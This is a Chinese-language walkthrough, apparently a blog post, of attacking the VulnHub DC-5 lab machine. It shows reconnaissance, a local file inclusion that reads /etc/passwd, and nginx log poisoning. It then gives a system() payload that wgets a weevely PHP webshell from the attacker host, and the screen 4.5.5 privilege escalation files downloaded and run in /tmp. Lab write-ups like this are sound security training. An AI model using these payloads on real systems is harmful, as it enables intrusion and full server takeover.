【DC-5渗透实战】


环境准备

在其👇靶场地址中搜索dc-5就可以找到其镜像文件了

靶场下载地址:https://www.vulnhub.com/
使用Vmware虚拟机中NAT网络
靶机 dc-5 :192.168.146.161
攻击机:
parrot 192.168.146.129
win7 192.168.146.134


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息搜集

示例:使用nmap探测服务器
-p-全端口扫描
-A主动扫描

nmap -A -p- 192.168.146.161 -T5

发现开放了80和111号端口
在这里插入图片描述

大致浏览一下该网站

在这里插入图片描述
使用nikto扫描网站目录

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h 192.168.146.161:80

并没有发现什么有用的信息┭┮﹏┭┮
在这里插入图片描述

二、渗透测试

1.发现可能存在文件保护漏洞

在网页的Contact专栏下发现可以提交的表单👇,可以从它入手!
在这里插入图片描述
burp抓包:目的是测试有哪些文件可以浏览。——穷举爆破文件名
在这里插入图片描述
burp添加自带的攻击载荷payload:filename-short,filename-long,然后start attack
在这里插入图片描述
在这里插入图片描述
看status响应号,发现foter文件名是可以200被请求出来的

进去看一下:

发现是发现footer页面因为有thankyou.php和footer.php相同的内容,考虑文件包含
在这里插入图片描述

2.爆破文件名和参数

进行文件名和参数爆破,并判断文件包含的参数名是什么
使用cluster bomb综合爆破模式在这里插入图片描述
设置pyload攻击载荷
在这里插入图片描述
fuzz模糊测试
在这里插入图片描述
看Length发现文件名file
在这里插入图片描述
发现/etc/passwd↓
在这里插入图片描述
访问该路径成功爆出服务器passwd的信息
在这里插入图片描述

同理本靶机既然能没有限制,是否能也访问到nginx(nmap扫描出来的信息)的日志呢

在这里插入图片描述
在这里插入图片描述
访问日志
在这里插入图片描述

尝试成功✌,然后到这里就考虑是否能写入一句话记录到日志中
使用parrot攻击机先进行测试

在这里插入图片描述
确实可以的😄O(∩_∩)O
在这里插入图片描述

3.上传木马到服务器

使用weevely生成php木马程序

Weevely介绍
Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式
构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性。
在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资
源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能

weevely generate 123456 haha.php

生成到本机的root文件下
在这里插入图片描述
使用python3开启简易的web服务,为靶机提供下载

python3 -m http.server 8000

在这里插入图片描述
抓包上传

a=system(‘cd /tmp; wget http://192.168.146.129:8000/haha.php;chmod + x haha.php’);

在这里插入图片描述
靶机上已成功下载该php文件

在这里插入图片描述
连接上线weevely木马

weevely http://192.168.146.161/thankyou.php?file=/tmp/haha.php 123456
shell_sh

在这里插入图片描述

三、服务器提权

find / -perm -4000 2>/dev/null

使用find命令查看可以利用的权限执行
在这里插入图片描述

searchsploit screen 4.5.5

利用searchsploit搜索其漏洞并将可利用的文件负责下来以便后续操作
在这里插入图片描述

cp /usr/share/exploitdb/exploits/linux/local/41154.sh  41152.sh

其实后续操作呢就是阅读这个.sh文件内容并且按流程操作就可以了
简单说明:需要分别创建.c文件并且进行编译后传到目标靶机服务器上,最后执行.runme.sh文件就可以提权到root

创建libhax.c文件
在这里插入图片描述
gcc编译👇

在这里插入图片描述
创建rootshell.c文件

在这里插入图片描述

也是gcc编译
在这里插入图片描述

最后创建runme.sh
在这里插入图片描述
分别下载到目标靶机tmp文件中

cd /tmp
wget http://192.168.146.129:8000/libhax.so
wget http://192.168.146.129:8000/rootshell.so
wget http://192.168.146.129:8000/runme.sh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
加可执行文件权限

chmod +x libhax.so
chmod +x rootshell.so
chmod +x runme.sh

在这里插入图片描述
最后运行提权

./runme.sh

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值